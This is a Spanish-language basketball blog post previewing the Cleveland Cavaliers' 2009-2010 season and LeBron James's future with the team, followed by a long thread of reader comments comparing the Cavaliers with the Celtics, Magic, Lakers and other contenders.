Cleveland Cavaliers 2009-2010: Un Anillo para atar al Elegido

29 de September de 2009 por TheDeerHunter

lebronbandwEstá comúnmente aceptada la teoría de que LeBron James únicamente permanecerá en Cleveland en el caso de que sean capaces de rodearlo con un equipo campeón. En realidad, hay quien duda muy mucho de que “El Elegido” renovará por los Cavs bajo ninguna circunstancia y, en cambio, otros muchos piensan que como allí no encontrará ningún sitio. Lo que sí parece cierto es que en la franquicia lo creen y se esfuerzan al máximo por mejorar la plantilla año tras año sin reparar en gastos y tratando de satisfacer en la medida de lo posible todos los deseos de su máxima estrella. El caso es que esta es la última oportunidad que tendrán para tratar de influirle en ese sentido.

No es fácil mejorar una plantilla que logró 66 victorias la pasada regular, fue virtualmente imbatible en su plaza y alcanzó la final de Conferencia con cierta facilidad. Cayeron, sí, circunstancialmente contra el tremendo equipo que resultó ser Orlando. Precisamente aquí vimos al LeBron más desmoralizado por haber luchado lo humano e inhumano para conducirlos a las Finales y, aun así, no ser suficiente. Su mayor decepción desde que llegó a la liga. ¿Tomó alguna decisión en ese infructuoso momento? No lo podemos saber.

shaqlebronSin embargo, el tan criticado Danny Ferry, cuya inteligencia alguno equipara a la de ciertos organismos unicelulares, ha jugado bien sus cartas trayendo al rejuvenecido co-MVP del pasado All Star Game, Shaquille O’Neal, a cambio de apenas nada, junto a veteranos objetivamente aprovechables como Jamario Moon, Anthony Parker y Leon Powe (lesionado de momento, eso sí).

Podríamos elucubrar sobre el aporte que supondrá Shaq para estos Cavs, sobre su impacto en la idiosincrasia del equipo o el vestuario, sobre si es una plantilla envejecida o si tiene suficiente calidad como para ser dignos escuderos de LeBron. Apenas nada puede garantizar un Anillo, pero objetivamente tienen un equipo sobre el papel muy superior al del año pasado e incluso al que quedó subcampeón. Y lo mejor de todo es que lo han montado con un amplio margen de maniobra ante posibles imprevistos… el margen que suponen más de 40 millones de dólares en suculentos expirings de cara al 2010, con todo lo que esa fecha significa.

LeBron volverá a ser el máximo candidato a repetir MVP con su contribución sideral alrededor del 30-7-7. El alfa y el omega, el creador y ejecutor. Será interesante comprobar cómo adapta su protagonismo con la presencia del Perro Grande, pero no esperamos una merma significativa ni aun suponiendo que jueguen más el estático. Shaq viene para explotar en Playoffs, para responder a Dwight cuando llegue el momento. Los años pasan inexorablemente pero Twister conserva crédito y respeto, más aún tras su infructuoso paso por Phoenix que, parece, desgastó a todos menos a la rejuvenecida versión de él mismo. La combinación Shaq-Ilgauskas podría resultar devastadora, pero ellos ya no westvarejaomoziestán para echar cohetes y tampoco hemos terminado de observar significativas ventajas en recientes experimentos de “torres gemelas”. Es probable que terminen turnándose para pasar la regular con el menor desgaste posible… eso si no terminan traspasando al lituano, como se venía rumoreando.

A expensas de resolver la incógnita Leon Powe a final de año, Varejao será el Power Forward titular y seguirá aportando toda la pelea del mundo y más. El brasileiro, por cierto, termina de firmar, por decreto “23” mediante, la jubilación asegurada (y la de unas cuantas generaciones de descendientes). Debería de tener más motivos que nadie para demostrar su agradecimiento. De Powe también dependerá que Hickson sea el 4º o el 5º interior. No esperamos un incremento significativo de sus prestaciones todavía.

Por fuera también se ha reforzado bien. A los Mo Williams y Delonte West que fueron exageradamente maltratados tras el fiasco de Orlando, se incorporan Jamario y Anthony Parker para apretar las tuercas a los aleros rivales y para diversificar las opciones tácticas a disposición de Mike Brown añadiendo mayor presencia física. Con cada vez menos peso en el equipo, mantienen al otrora deslumbrante Daniel Gibson. Finalmente, ya muy en el fondo del armario, quedan los sophomores Darnell Jackson y Jawad Williams junto al rookie Daniel Green. Con total seguridad no contarán apenas con oportunidades si las cosas marchan con cierta normalidad. Además, durante los últimos días se ha continuado especulando con la posibilidad de incorporar otro jugador más de perímetro a fin de cubrir más las espaldas ante posibles eventualidades (a raíz de la detención de Delonte por posesión ilegal de armas y, también hay que decirlo, por sus antecedentes psicológicos). Lo que está claro es que la plantilla no está en absoluto cerrada y el nivel de exigencia es mayor que nunca.

No quieren dejar nada para la improvisación. No van a haber excusas. LeBron va a tener la mejor oportunidad de su vida de alcanzar el Olimpo. Sólo él sabrá si será suficiente para quedarse en Cleveland. En cualquier caso, con un Anillo de por medio, no sería fácil tomar la decisión de alejarse de un equipo campeón.

Quinteto inicial: Mo Williams, Delonte West, LeBron James, Anderson Varejao, Shaquille O’Neal

Sexto hombre: Zydrunas Ilgauskas.

Pronóstico: Finalistas.

Comenta

35 comentarios a esta entrada

  1. Dantley2 dice:
    #1

    Yo también los veo como finalistas por encima de Celtics. Para mí el año pasado les faltó tener un plan B frente a Orlando. Shaq será ese plan B.

    Por cierto, un par de noticias relacionadas con los Cavs. LeBron ha comentado que le gustaría jugar más por dentro. Mejor maestro que Shaq imposible, pero ¿qué significa esto? ¿jugar más de 4 y todo el equipo más abierto con Moon haciendo más trabajo sucio en el 3 o Parker teniendo más libertad en ataque? ¿jugar más en estático con LeBron más metido al poste bajo? Para esto último les faltarían tiradores por fuera que aprovecharan los dos contra uno que le harían a LeBron.

    La otra noticia es que Delonte West se ha metido en líos por posesión de armas, pero vamos, que quedará en nada.

      Citar

  2. Asdare dice:
    #2

    Interesante propuesta la de los Cavaliers, quiza la que mas ganas tengo de ver este año. Sobre una base ya buena (finalistas del este) han hecho 4 fichajes que pueden cambiar la “lebrondependencia” tal y como la conocemos:

    -Parker, si la edad se lo permite, sera su mejor defensor con un tiro que no desmerece al de los demas. Le quitara bastantes minutos al multitatuado Delonte.
    -Moon es un alero que puede atacar el aro desde fuera. Salvo Lebron, eso no lo tenian hasta ahora los Cavaliers.
    -O’neal, sencillamente por fin van a poder jugar al poste bajo, ademas de parar a pivots del tipo Howard.
    -Powe, cuando se recupere puede hacerse con el puesto de titular, ya que con O’neal la importancia de Varejao se vera algo reducida.

    Ahora bien, estas mismas ventajas respecto al año pasado tambien son su principales preocupaciones. No olvidemos que Cavaliers hizo quiza el mejor baloncesto del año pasado, y solo una actuacion de Orlando con Howard inmenso y sobre todo, Turkoglu elevado al rango de superestrella, les dejo fuera de las finals (por cierto, de las mejores eliminatorias que he visto en los ultimos años en la NBA). Pero ahora con la llegada de O’Neal todo va a cambiar, y una adaptacion siempre te puede salir mal.

    Ademas, para ganar el anillo algun escudero de Lebron tiene que dar un paso adelante. Todos los campeones NBA de los ultimos años han tenido 2 o 3 jugadores a un nivel superior al resto. El año pasado, Lebron estuvo mejor que nunca (40ppp en la final del este no?) pero se quedo excesivamente solo. Y O’neal en esto si que me transmite dudas. De acuerdo que les va a ayudar una barbaridad, pero le permitira la edad tener un papel como el de, por ejemplo, gasol en los lakers? No se. Y Mo Williams tampoco me da mucha seguridad: demasiado irregular, a Cavaliers quiza le hacia falta un base que mande mas, porque sino Lebron acaba hasta subiendo la bola y a los rivales les va a dar igual que meta 20 o 60 puntos: con parar a los demas basta.

    Buen equipo, de los grandes favoritos al anillo. De todas maneras, si edad y lesiones respetan a los Celtics les veo un pasito por delante. Su ritmo de juego mas controlado y lento y su gran experiencia pueden ser un obstaculo demasiado grandes para estos Cavaliers.

      Citar

  3. sergio dice:
    #3

    Puf… yo pienso, tal y como ya habeis apuntado alguno, que la mejora que van a experimentar estos Cavaliers esta en la variedad de su juego y el aumento de suplentes aunque no vea ni un base puro (ya, los Lakers tampoco y mira…). Estos jugadores deberían crear equipo (algunos veteranos), dar descanso y ofrecer muchas mas posibilidades tacticas que antes. Si bien no tengo a Mike Brown por un gran tactico… será dificil que incorporando a O’neal, Moon y Parker no estemos hablando del mejor equipo defensivo de la liga (si… mejor que Boston).
    Pero no se porque creo que no van a llegar siquiera a las Finales. El este se ha vuelto salvaje (que Playoffs el año pasado…..), pienso mas en la capacidad de Howard de parar a O’neal que al contrario, Boston y Orlando sin lesiones tienen mejores equipos actualmente, periodo de adaptacion de 4 piezas importantes en Cleveland (aunque si con 82 partidos de regular no pillan el juego….), ¿algun dia se lesionara LeBron?, ¿Mo Williams trabajará en Playoffs?, frente a Rondo, Allen y Pierce, ¿que equipo sacas? o haces cambios de balonmano o el equipo se resiente y mucho… en fin…. creo que estoy buscando demasiados interrogantes que tambien existen en todos los equipos pero digamos que no me da…. “feeling” para llegar a las cotas que se le suponen (empiezo a parecerme a Guardiola xD)

      Citar

  4. Gallis dice:
    #4

    mmm, para mi, sin duda, el mejor fichaje de los Cavs es Parker. En este equipo el poderío físico es inversamente proporcional a la inteligencia baloncestística, y ahí Parker les vendrá de perlas.

    Yo reconozco que sigo siendo muy escéptico con este equipo. Creo que ganaran infinidad de partidos por aplastamiento en Regular Season, pero en una eliminatoria contra los Celtics, con todos sanos por ambas partes, veo mucho más equipo a los verdes.

      Citar

  5. pcerezo dice:
    #5

    Pues yo discrepo de vosotros, lo siento.
    No veo lo de estos Cleveland. En cuanto a calidad pura muy lejos de Lakers, demasiado. Incluso Celtics, para mi, tienen mucho más.

    Incorporaciones:
    – O’neal: ya no está para estos trotes. En los últimos 3 años no ha hecho nada. En estos momentos es más nombre que otra cosa. Puede que me equivoque pero no lo veo desequilibrando el Este.
    – Parker: muy viejo. Las dos últimas temporadas no ha defendido como lo venía haciendo y además no ha tenido los porcentajes de pasadas temporadas. No le tengo nada de fe.
    – Moon: no ha demostrado nada en la liga. Jugador de medio pelo. No creo que aporte más allá de un mate que pueda salir en las mejores jugadas. Y cuando se tengan que jugar las lentejas, como para ponerse a luchar con Pierce, Rashad Lewis, Ray Allen, no llega…

    Problemas:

    – Ilgauskas: los años no pasan en balde.
    – Varejao: su aportación es física, algún intangible pero no llega para el pastizal que gana.
    – Gibson: creo que va a ser un Craig Hodges pero sin tirar tan bien…

    Les doy final de conferencia pero amigo, los Celtics con Garnett y si consigen motivar a Rasheed para mi son superiores.

    Un saludo,
    Pablo

      Citar

  6. TheDeerHunter dice:
    #6

    Pues a mí Oneal, con 17 puntos 8 rebotes (sin haciendo nada) me parece que es más que Rasheed ultra-requete-motivadísimo…

    Me parece correcto todo lo que digáis de Cleveland, pero lo único cierto es que con la incorporación de estos cuatro “pseudo-titulares” son un equipo superior a los “fracasadísimos” finalistas de conferencia del año pasado. Y no olvidemos que se enfrentaron también a los Celtics entonces.

    Ya llegaremos a los verdes, que se han movido bien… pero me da que lo de Sheed se está magnificando demasiado (porque lo suyo sí que ha sido “no hacer nada” la última temporada) También llegaremos a Orlando, que parece que nunca cuentan.

      Citar

  7. Viva_Dirk dice:
    #7

    Para mi Boston está un punto por encima, no por plantilla en general, pero si por variedad real de jugadores y de ‘estilos de ejecución’.

    Los Cavs no tienen a nadie que sueñe con parar a Garnett y desde luego Mo Williams no defiende bien a casi nadie, mientras que Rondo puede con Williams y una buena defensa colectiva puede parar al actual Shaq.

    Pero vaya, equipo tiene para ganar, si no lo hace igual hay que mirarle un poco a el y menos a los demás.

      Citar

  8. sergio dice:
    #8

    Que diga que los Cleveland no me dan la confianza que me dan los Celtics no significa que no se hayan reforzado mucho mejor. Los Celtics no tienen a los Cassell, Posey, Pj Brown o Leon Powe como hace dos años pero siguen teniendo un quinteto titular mas compensado y de mayor calidad que los Cavs.Igual le pasa a los Magic que los veo a la altura de Cavs…

    Yo este año veo que el ganador de la NBA sale del oeste entre Lakers, Spurs o Mavericks (si… a Dallas hay que nombrarlos por lo menos que tambien se han reforzado muy bien)

      Citar

  9. pcerezo dice:
    #9

    TheDeerHunter,

    Yo tengo la sensación que O’neal no va a llegar a esas cifra que nos dices, pufff!!! 17 puntos por partido se antojan muchos y demasíados para lo mal reboteador que ha sido O’neal a lo largo de su carrera.

    Los Celtics tienen más calidad en conjunto, yo tengo esa sensación. Hay más tíos más fiables que en los Cavs. Pero veremos.

    Por cierto, yo sin dudarlo estoy con Sergio, el campeón sale del duelo Lakers-Spurs. Me la juego pero ya, con los Celtics dando guerra.

    Ya llegaremos a Orlando, pero el cambio Carter (el de hoy) por Turkoglu…no sé, no sé….

    Un saludo,
    Pablo

      Citar

  10. portu dice:
    #10

    PCerezo quizás ha exagerado un pelín y ha obviado el efecto Lebron, algo q permite ganar muuuuchos partidos en Regular Season y q puede hacer ver q sus compañeros son mejores de lo q realmente son en algunas fases, pero estoy de acuerdo con él en q jugadores como Moon son jugadores de medio pelo, tb veo sobrevalorado a Varejao y creo q Mo Williams tampoco es el base ideal para este equipo. Considerando q Parker llega algo “tarde” a un equipo aspirante, en conjunto veo q la mejoría no es tanta como parece, podría resumirse al papel de Parker y Shaq, pero proporcionalmente a ese beneficio caerá la aportación de Ilgauskas, Delonte y Gibson. Globalmente creo q les falta tiro exterior. Al final todo se resumirá a lo q haga Lebron, hoy por hoy, de lejos el jugador más desequilibrante de la NBA…

      Citar

  11. TheDeerHunter dice:
    #11

    ¿Mal reboteador Shaq?? no le ha hecho demasiada falta matarse para coger rebotes… pero de ahí a mal reboteador… tampoco entiendo la relación directa de puntos que vaya a anotar ¿lo dicen porque en Cleveland le pueden llegar pocos balones?? lo tendrán que ver mis ojos.

    También habéis hablado de Mo Williams como un base poco cualificado para este equipo… pero es el equipo de LeBron que apenas ha necesitado estos años un base como tal!!! Los tan criticados West y Williams hicieron contra Orlando un 14,5 y un 18,3 ppp respectivamente. Os digo que a Williams se le fichó precísamente para hacer ese 18% aprox. A nadie se le pasaría por la cabeza que se tuviera que marcar otros 30 puntos además de los que hiciera LeBron. Qué locura.

    A los que llamáis “jugadores de medio pelo” deberéis valorarlos cumpliendo una labor específica en esta ocasión… no como los titulares que han sido estos años en otros equipos. Para mí son perfectamente válidos… y lo que es más importante: son refuerzos que, como se suele decir, van directamente a la cuenta de resultados. Y esa es la mejora que parece (que es MUY significativa con respecto a la que daban Big Ben, Szcerbiak o Joe Smith el año pasado… ni punto de comparación, vamos)

    Y no he dicho que estos Cavs vayan a ganar con la gorra a Celtics y Orlando. Que conste. Nada más lejos de lo que pienso.

      Citar

  12. pcerezo dice:
    #12

    Para su aportación de puntos Shaquille nunca ha sido un gran reboteador a pesar de su presencia en la zona. No hablo de que le lleguen más balones o menos, simplemente creo que físicamente ya no está para meter 17 puntos por partido. Tengo esa sensación. Sería una gran aportación para Cleveland, pero me da que no llega.

    Evidentemente el efecto Lebron es muy grande y da para ganar 60 partidos en temporada regular. Seguro que llegan a ganarlos, pero amigos, las lentejas te las juegas de abril a junio y ahí los equipos del Este se ponen el cuchillo en los dientes y a muerte y no veo a jugadores como Moon, Parker, Williams, Delonte, Gibson marcando una pequeña diferencia para mejorar con respecto a lo que tienen Orlando y Celtics, compararlo ya con los Lakers, Spurs o incluso Denver ya ni hablamos.

    Lebron es un jugador fantástico, genial, resolutivo, puede meter 29 puntos en un último cuarto de un partido de final de conferencia, creo que la plantilla de la que está rodeado en Cleveland es muy buena pero es que Lakers y Spurs son tremendos.

    Si no consigue este año Lebron el anillo, se mete en una encrucijada de narices porque a ver dónde se va….

    Un saludo,
    Pablo

      Citar

  13. Viva_Dirk dice:
    #13

    Lebron hasta que no haga algo mas que números no puede ser considerado de ninguna manera el jugador mas desequilibrante.

    En lo otro, yo si creo que Shaq va tiene cuerda para hacer un gran año y eso va a suponer un gran refuerzo para los Cavs, pero es que los pasados play-offs los Celtics jugaron sin juego interior y no estuvieron tan lejos de jugar la final de conferencia.

      Citar

  14. Jabho dice:
    #14

    Creo que estamos de nuevo ante el campeón de la regular. Y creo que PO serán competitivos. Llevan 3 años siendo competitivos, así que no dudo de ellos. Harán finales de conferencia seguro y a partir de ahí veremos. Para mi tienen suficiente para ganar y Shaq en PO tras una regular a medio gas puede dar mucho de sí, sobre todo en defensa. Vamos, el roto que les hizo Howard ni de lejos lo hace teniendo al Shaq actual enfrente.

    El problema de lo Cavs es que de los 4 aspirantes, 3 se han reforzado respecto al año pasado y el 4º fue el campeón. Ellos lo han hecho bien y sobre todo cara PO donde Parker y Shaq (y Powe si llega) darán un salto de calidad…

    Yo confío en los Cavs pero veo el anillo muy igualado. Ah y el campeón saldrá este año del Este.

      Citar

  15. Txusma dice:
    #15

    Como algo más que número podemos nombrar llevar a su equipo (y vaya equipo…) a una final de la NBA y a unas finales de conferencia, así como de varias canastas decisivas para ganar partidos? También le podemos sumar el hecho de que creo q es el jugador que más defensa aboserbe del equipo rival dejando el camino libre al resto de compañeros.

      Citar

  16. Viva_Dirk dice:
    #16

    Bueno lo del año pasado fue mas bien un fracaso, en los planes de los Cavs estaba jugar la final de todas todas una vez que Boston estaba sin Garnett. Que Lebron hizo todo lo que pudo sin duda, pero lo del año pasado no creo que se le pueda poner como algo positivo.

    Si, llevó a su equipo a una final de la NBA, los hay que han hecho lo mismo o que incluso la han ganado. Para ganar este mismo año el anillo no cambio a Kobe por Lebron, absorba mas defensa o lo que sea, Kobe y otros han demostrado mas que el.

      Citar

  17. kantonyo dice:
    #17

    No me atrevo mucho a pronosticar sobre los Cavaliers, viendo el patinazo del año pasado, aunque me dieron la razón en la eliminatoria contra Orlando, en las carencia que tenía la plantilla.

    Este año, teniendo en cuenta que LeBron ha demostrado que él solo puede llevar a esta franquicia a lo más alto, apuesto por que como mínimo llegaran a las finales del este, y volveran a realizar una gran temporada regular con 55-60 victorias. No le veo campeón, creo que Lakers está por encima. También veo mejores a San Antonio, Boston, Orlando y Denver.

    La incorporación de Shaq es bastante cuestionable, su llegada a Phoenix acabó de un plumazo con las aspiraciones de la franquicia y habrá que ver si aporta más que estorba en Cleveland.

    Por su parte, tanto Moon como Parker, han tenido una temporada para olvidar, aunque la versatilidad de Parker podría ayudar saliendo desde el banco. Y por último no veo a Powe jugando muchos minutos teniendo por delante a Shaq, Ilgauskas y Varejao. Incluso yo apostaría por que JJ Hickson tendrá sus 15-20 minutos este año, sigo confiando en el antiguo jugador de NC State.

      Citar

  18. TheDeerHunter dice:
    #18

    El caso de los Suns es distinto. Fue una apuesta muy arriesgada por un cambio de rumbo que en ese momento funcionaba a las mil maravillas (iban líderes de la liga) hacia un estilo muy distinto… más orientado a playoffs pero bastante experimental para ellos en el peor momento del mundo.
    Fue producto de una reacción bastante artificial también, al fichaje de Gasol. El miedo a quedarse descolgados en la carrera que se inició en ese momento. Ese tipo de reacciones tampoco suelen conducir a nada bueno.

    También perdieron un jugador fundamental para ellos los últimos años. Marion, aunque ya no estaba a gusto, continuaba dándoles un rendimiento excelente en ese sistema en concreto.
    Pero además, porqué no decirlo, Steve Nash se ha ido desfogando precísamente en ese momento. Ya lo pasó mal en aquel último enfrentamiento contra los Spurs con Bowen abusando de él.

    En el caso de los Cavs llega sólo a sumar (el año pasado era técnicamente el mismo equipo pero sin él) No es ni parecido.

      Citar

  19. portu dice:
    #19

    Lo del año pasado no fue positivo para Cleveland??? jo, lo q hay q leer, el mejor equipo de la Regular Season y caen en Final de Conferencia… todo eso pese al equipazo: Varejao, Wally, Delonte, etc, Kobe sin Pau y sin Shaq tb llegó a muchas finales y las ganó…….

      Citar

  20. TheDeerHunter dice:
    #20

    No sé, Portu, tío… tú dirás si eran o no favoritos contra Orlando. Yo creo que sí… pero palmaron.
    Es a esto a lo que algunos nos referimos como “fracaso”.

    Kobe sin Shaq ni Pau nunca ha tenido un equipo del nivel al del año pasado de LeBron.

      Citar

  21. Viva_Dirk dice:
    #21

    Juas, a ver a que viene sacar a Kobe ahora, pero de todos modos no puedes comparar, Kobe tenia a Odom y para de contar, y Odom dió un nivel bajísimo como 2º espada. Lebron tenía a Mo Williams e Ilgauskas como anotadores secundarios, Mo Williams fue All-Star, Varejao hace su trabajo igual que Delonte que jugó bien en la final de conferencia. Y otra cosita, Lebron juega en el Este, donde se le ve bastante cómodo, en ninguna quiniela aparece un equipo del Oeste para hacerse con sus servicios el próximo verano.

    Y desde luego que eran favoritos contra Orlando, mas aun habiendo tenido dos primeros cruces comodísimos, como los de los Lakers de Kobe, jeje.

      Citar

  22. portu dice:
    #22

    Favoritos Cleveland a principio de temporada? lo dudo. Una vez iniciados playoffs y con Boston con lesiones, entonces sí q eran favoritos, pero a principios de año casi nadie los daba como favoritos igual q tampoco nadie confiaba en orlando para finalista.

    Comparar equipos y acompañantes de estrellas… somos masocas, je,je,… bueno, sólo un comentario a lo q dice Viva: dice q Mo Williams venía de ser All Star… y poco antes dice q Odom de 2º espada de Kobe no aportó lo q se esperaba de él… y Odom no venía de ser All Star con Miami? y Mo Williams no ha aportado este año pasado menos de lo q se esperaba de él????
    Me repito, pero es q sinceramente, ver titulares como Ilgauskas, q ya está para pocos trotes y no pisa la pintura ni por asomo, Delonte y Varejao,… pues que quereis q os diga, a mi me parece un quinteto q sin Lebron sería lo peor de la NBA…

      Citar

  23. Txusma dice:
    #23

    Antes de lo q te lo digan otros portu, Lamar Odom nunca ha sido AllStars aunq es cierto q su año de Miami, posiblemente el mejor de su carrera. Lo q no tengo claro es q esperaban los aficionados angelinos de Odom. Cuantitavamente, sus numeros nunca han sido muy diferentes de aquellos q marco en Miami hace unos años.

    Pero el tema es Cleveland. Yo estoy un poco con Portu en q tal vez exageramos la calidad de los compañeros de Lebron, sobretodo los del ultimo año. Obviando a Mo Williams, q ha ejercido de segundo espada con exito (de hecho ha hecho la mejor temporada de su carrera) el resto de jugadores tampoco son que digamos la repanocha. Teoricamente el tercer mejor jugador era Ilgauskas y ha anotado 13 puntos y recogido 7.5 rebotes por partido, no parecen unos numeros muy increibles. Y si miras atentamente los de Delonte, Varejao, Gibson, etc… tampoco son para tirar cohetes. De hecho, el qinteto esta lejos del qinteto titular de Celtics, Magic, Lakers, Spurs o Nuggets, por ejemplo. Y ya no digo nada si quitamos al mejor jugador de cada uno.

      Citar

  24. Viva_Dirk dice:
    #24

    A ver Txus, salvo los Celtics, todos esos que dices son equipos del Oeste, los Cavs con Lebron eran favoritos a ganar el Este una vez que Boston estaba sin Garnett y sin nada de juego interior. Eran favoritos contra Orlando a pesar de que Orlando tenga mas jugadores de calidad porque Cleveland tiene a Lebron y un equipo diseñado para el, para explotar sus virtudes tenia jugadores que cumplian roles específicos y a parte a Mo Williams que promediaba 18 puntos por encuentro. Y vaya, con Manu lesionado todo el año, no hubiese cambiado la plantilla de Cleveland por la de San Antonio ni loco.

    Ah, y dice Portu que nadie confiaba en ellos a principio de la temporada pasada, a los hechos me remito: http://blog.tjnba.com/2008/10/01/cleveland-cavaliers-hasta-donde-lebron-les-lleve/ Salvo Kantonyo todos les veiamos perdiendo contra Boston en la final, una vez fuera Boston, ellos eran los clarísimos favoritos.

    Vamos, Odom no dió el nivel de Mo Williams el año pasado, y además aquellos Lakers no jugaban en primera ronda con una piltrafa como era Detroit el año pasado o los Wizars de 2007. Esas comparaciones Oeste-Este siempre son muy perjudiciales para los del Oeste que se enfrentan a equipos mucho mas duros desde la primera ronda, que le pregunten a los Jazzs.

      Citar

  25. Landrusski dice:
    #25

    A mi los movimientos de cleveland sinceramente creo que lo han exo genial…Oneal no sera el que era,pero intimida una barbaridad y ya te digo yo que en una serie contra orlando howard no le hace otro roto a cleveland como el año pasao. Parker es un jugador que me encanta y que va a aportar muxo a este equipo. Powe si esta bien y le dan partidos le puede dar un sustito a varejao y relegarlo al bankillo.Por ultimo moon,me parece interesante,es un tipo agresivo defensivamente,nunca viene mal a un equipo.
    Ahora bien,yo a cleveland le veo perdiendo otra vez en las finales de conferencia,en este caso contra boston…
    Yo a boston lo veo por encima e inclusive que pueden parar a lebron(si amigos frenarle,lo mismo se mete 40 puntos,pero no va a ser ni decisivo en el partido) defendiendole pierce muy lejos del aro y con constantes ayudas(me direis que lo hacen todos los equipos,estamos de acuerdo pero defensivamente algun equipo mejor que boston dificil).

      Citar

  26. portu dice:
    #26

    Teneis razón q odom no ha sido All Star, no recordaba ese dato, pero esa temporada de Miami fue muy buena, de nivel All Star o casi… luego, en la 2006-07 acabó en 16-10 y los Lakers cayeron en 1era ronda. Vale, q el Este no es comparable al Oeste, pero sigo creyendo q ese Odom era mejor 2º espada de lo q se dice tanto en números como en juego, y Kobe estaba en plan megaestrella en esa fase, pero no pasaron de 1era ronda…….
    El sitio de Cleveland en los pronósticos obviamente era finales de Conferencia, pero el mismo título de las predicciones lo deja claro: dónde Lebron les lleve… justo antes de la Final de Conferencia yo tb les hubiese dado como favoritos frente a Orlando, no confiaba mínimamente en el Turko para defender a Lebron, pero por otro lado, tb estaba claro q el juego interior de Orlando iba a hacer estragos en Ilgauskas-Varejao, favoritos sí, pero no tan favoritos como podían ser los Lakers en el otro lado…

      Citar

  27. Viva_Dirk dice:
    #27

    Los otros jugadores que mas minutos jugaban en aquellos Lakers eran:

    – Smush Parker: Sin sitio en la NBA y cortado por los Heat dos meses después de firmale un contrato por 2 años.

    – Brian Cook: Ya me dirás lo que ha jugado después de aquello.

    – Kwame Brown: El hombre que mas mates y bandejas ha fallado en la historia de la liga.

    – Chris Mihm: Ya se perdia mas de 20 partidos al año, y no estaba disponible en play-offs.

    – Luke Walton: Lo que es ahora pero con menos experiencia.

    Vamos igualito que Varejao, Delonte e Ilgauskas.

      Citar

  28. Txusma dice:
    #28

    El error es seguir comparando a los Cavs con esos Lakers. Yo al menos, no he puesto en tela de juicio la actuacion de Kobe en aquella temporada, actuacion a todas luces extraterreste. Simplemente digo q la plantilla de Celtics y Magic, si qitamos el mejor jugador de los 3 equipos, es, de lejos, mucho mejor. Nada mas.

      Citar

  29. Viva_Dirk dice:
    #29

    Pero entonces Lebron no cuenta? Es evidente que los Cavs se han centrado en Lebron, han ido añadiendo piezas cada año y han escuchado lo que decía su superestrella, en el verano de 2008 pidió un anotador exterior que le acompañara y le trajeron a Mo Williams, dijo que sería buena idea renovar a Varejao y lo renovaron, y después de perder ante jugadores mas expertos como Turkoglu o Lewis, han traido a Shaq y Anthony Parker.

    Lo que tu dices es cierto, pero eso no hacer que la derrota ante Orlando deje de ser una sorpresa.

      Citar

  30. Txusma dice:
    #30

    Una sorpresa pero pequeñita. Sorpresa hubiera sido que hubieran caido en primera ronda. Yo lo q defiendo es que tampoco se puede considerar como fracaso el haber partido contra los Magic en final de conferencia. Y Si quito a los mejores de cada equipo es pq alguien ha insinuado por aqui q a lo mejor habria q empezar a mirar a Lebron. Venga ya!

      Citar

  31. Viva_Dirk dice:
    #31

    Si este año no gana la conferencia con su equipo al completo, algo habrá que mirarle a el, que se supone es el factor diferencial.

      Citar

  32. portu dice:
    #32

    A mi lo q me resulta curioso es el distinto rasero con que se mira a los cracks… si Kobe no pasa de 1era ronda con Odom es pq el equipo era muy malo, pq Odom bajó el nivel o pq el Oeste es muy salvaje, mientras q si Lebron no gana la Final de Conferencia es pq Lebron no da la talla ya q supuestamente le acompañaba un buen equipo como son Varejao&comp. y pq el Este es muy fácil… vamos, hombre, que siempre es lo mismo… a mi me gustan más Wade y Lebron que Kobe, no tengo ningún problema en reconocerlo, pero si cada uno arrastra a su equipo a lo bueno y a lo malo me parece que hay que medirles a todos con el mismo rasero… tema recurrente con otros muchos, los clásicos Jordan, Iverson, etc, etc, etc,.

    Hablaba otra vez Viva de los componentes de los Lakers que cayeron en 1era ronda… pues ya me contarás qué será dentro de dos años de Ilgauskas, de Varejao, de Delonte o de Mo Williams…

    Para este año, de dónde partía toda esta discusión, pues evidentemente que Lebron es el factor diferencial, pero que tiene el equipo al completo… Shaq quizás sí, pero los demás yo sigo sin verlos refuerzos de 1er nivel, otra cosa es que haya buena química, que no haya lesiones, que se solapen bien los puntos buenos y los menos buenos y que el equipo funcione, pero yo sigo viendo defectos claros, como es tener de base a Mo W., q para mí es un base q sólo se ha movido bien siendo él la estrella en ataque, como director de juego no es para tanto, Varejao un pakete de tomo y lomo, que además los árbitros ya tienen calado con su teatro y en las finales no le pitaron ni una de las 1000 q se tiró cuando Howard le toría, lucha, brega y nada más…, Moon… buen saltarín, Parker con 30 y bastantes… pues sigo creyendo q llega tarde a estas lides y se supone q será el 2 titular…. Toronto con Moon, Parker y dos cracks como Bosh y Calde ya sabemos lo bien que lo han hecho estas dos últimas campañas…

      Citar

  33. Viva_Dirk dice:
    #33

    Puedo contarte donde estaba Ilgauskas cuando llegó Lebron y desde luego veremos donde están Varejao y Delonte en un par de años, jugando mas de 20 minutos en un equipo muy competitivo o mas de 30 en cualquier otro. Parker y Moon llegan para completar una plantilla que ya jugó la final de conferencia, al igual que Shaq, no hay NINGUNA baja significativa y llegan ellos que pueden aportar experiencia, lo que ha pedido Lebron, otra vez han satisfecho sus deseos. Los Cavs tienen ese tipo de jugador que tu describes con Varejao porque Lebron dijo que lo renovaran, tienen a Mo Williams porque pidió un anotador exterior, no se que mas quiere.

    Ah, a mi hay muchos que me gustan mas que Lebron, pero no tengo pegas en decir que Lebron es el mejor alero de la liga, un top-3 y el que mas condiciones tiene para marcar una época.

      Citar

  34. portu dice:
    #34

    Que Lebron pidiera la renovación de Varejao no quiere decir que quiesiera a Varejao de titular, ojo, es un jugador válido para aportar minutos de mucha lucha, pero se suponía q el refuerzo era Ben Wallace y ya sabemos cómo les salió…

    Siguiendo con las comparaciones me gustaría introducir un nombre a la discusión: Dirk Nowitzki…;)
    Este año Dallas cuenta con Kidd-Terry-Josh Howard-Marion-Gooden-Nowitzki-Dampier como rotación más importante… con este equipo lo menos q se le puede pedir a Dirk es q ganen las Finales de la NBA por 4-0, no? es q comparar a estos tíos con Mo Williams, Delonte, Parker, Moon, Ilgauskas, Varejao y Shaq me parece q coloca en una posición peligrosa en cuanto a expectativas al alemán, no?

    Esto en realidad son temas no extrapolables, lo de Dallas es un poco para meter cizaña, pq yo creo q Dallas no va a llegar ni a la Final de Conferencia, y lo creo pq considero sobrevalorado a Kidd, pq creo q habrá poca química de equipo con tíos como Marion y Gooden y pq tb creo q Dirk tiene algunas limitaciones para ser un tío superdeterminante, creo q su sitio podría ser parecido al de Gasol, es decir, un perfecto 2º espada, pero no lo veo como un top 3 para llevar a su equipo sin otra superestrella a su lado a ganar campeonatos.

      Citar

  35. Viva_Dirk dice:
    #35

